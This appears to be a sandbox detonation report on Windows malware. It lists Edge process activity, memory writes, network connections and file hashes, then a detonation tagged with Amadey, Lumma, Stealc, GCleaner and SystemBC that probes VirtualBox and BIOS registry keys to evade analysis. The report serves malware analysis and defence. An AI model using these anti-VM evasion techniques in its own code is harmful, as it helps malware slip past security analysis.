N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5080 wrote to memory of 2320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 2320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3120 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 3120 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5080 wrote to memory of 4904 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f86f46f8,0x7ff8f86f4708,0x7ff8f86f4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10773371733666435258,9919719629179311358,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 /prefetch:2

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fffde59525dd5af902ac449748484b15
SHA1 243968c68b819f03d15b48fc92029bf11e21bedc
SHA256 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762
SHA512 f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645

\??\pipe\LOCAL\crashpad_5080_BSPSSOACWQNWCXYB

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ab283f88362e9716dd5c324319272528
SHA1 84cebc7951a84d497b2c1017095c2c572e3648c4
SHA256 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2
SHA512 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 10bf642ac57e600422a5a3557ee16d98
SHA1 e8151529351b298372afa609d858c2c47c76e3e7
SHA256 db9f95714608f587eccccee430df0a34f8e5c37fdcd211cd1355bacd8a080f3c
SHA512 55d4915202219328869dda4a58dd9f6ce2584c0946611f6278b6932fa4a7877917ea4df68a0dfcb84ef38d76b9863190048e3b84fbdd6df85d225d5f4b4a787b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e1bf87195c3b140dd67bfd6be1bfc089
SHA1 5b383cd439b0c8931f2c3656d549dc1a9d66ab60
SHA256 cee9bea1e681e859e0dd39c0c1e1f242572e2e3b9cf0b84ffaa4ca1da7b4a0b4
SHA512 c2ddaca5cc1af9819f8613fa43c012c74d7292729a2d888d2a51513a7ffbf223cb534e64f4f9f5e0fd4d409fca672106e34d3cabcfaf4ee7c67fa5f09062e2bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1ea5a5d84dce5c715a07e64e743bc88c
SHA1 c83b993da9aedaa86ffad66e4dbce0a02525e6af
SHA256 a3a09906137ff4a94cf8d91eb925d84bee69a45b805797ab6bb3850db6ef216e
SHA512 409b4642388c165465854f68dcc071fa0e6c4f7e56efa18f549eb4b2df459627b240c1c902faf848f86a33c250328078168ba4e17ed5a19d62b0b0263931ed07

Analysis: behavioral15

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\download.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\eltqgcf\oamb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\eltqgcf\oamb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\eltqgcf\oamb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2v5527.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3b39d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
